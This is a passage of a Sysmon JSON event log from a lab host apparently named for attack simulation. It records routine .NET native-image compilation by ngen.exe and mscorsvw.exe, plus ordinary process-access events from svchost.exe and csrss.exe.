FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:20.372","ProcessGuid":"{E2A3D6B1-133F-5F25-0000-001028600D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1234-0\\PresentationBuildTasks.dll","CreationUtcTime":"2020-08-01 07:01:20.372","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7978,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.419\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010F8A90000}\r\nSourceProcessId: 992\r\nSourceThreadId: 3360\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.419","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010F8A90000}","SourceProcessId":"992","SourceThreadId":"3360","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+ed71|c:\\windows\\system32\\rpcss.dll+ca3e|c:\\windows\\system32\\rpcss.dll+b157|c:\\windows\\system32\\rpcss.dll+7897|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7979,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.435\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00103B640D00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.435","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00103B640D00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7980,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.435\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00103B640D00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.435","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00103B640D00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7981,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.435\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00103B640D00}\r\nTargetProcessId: 4928\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.435","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-00103B640D00}","TargetProcessId":"4928","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7982,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.497\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001011680D00}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.497","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001011680D00}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7983,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.497\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001011680D00}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.497","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001011680D00}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7984,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.497\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-001011680D00}\r\nTargetProcessId: 4788\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:20.497","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1340-5F25-0000-001011680D00}","TargetProcessId":"4788","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7985,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:20.544\r\nProcessGuid: {E2A3D6B1-1340-5F25-0000-001011680D00}\r\nProcessId: 4788\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12b4-0\\PresentationFramework-SystemCore.dll\r\nCreationUtcTime: 2020-08-01 07:01:20.544","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:20.544","ProcessGuid":"{E2A3D6B1-1340-5F25-0000-001011680D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\12b4-0\\PresentationFramework-SystemCore.dll","CreationUtcTime":"2020-08-01 07:01:20.544","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7986,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:20.575\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1340-5F25-0000-00108C6C0D00}\r\nTargetProcessId: 4848\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 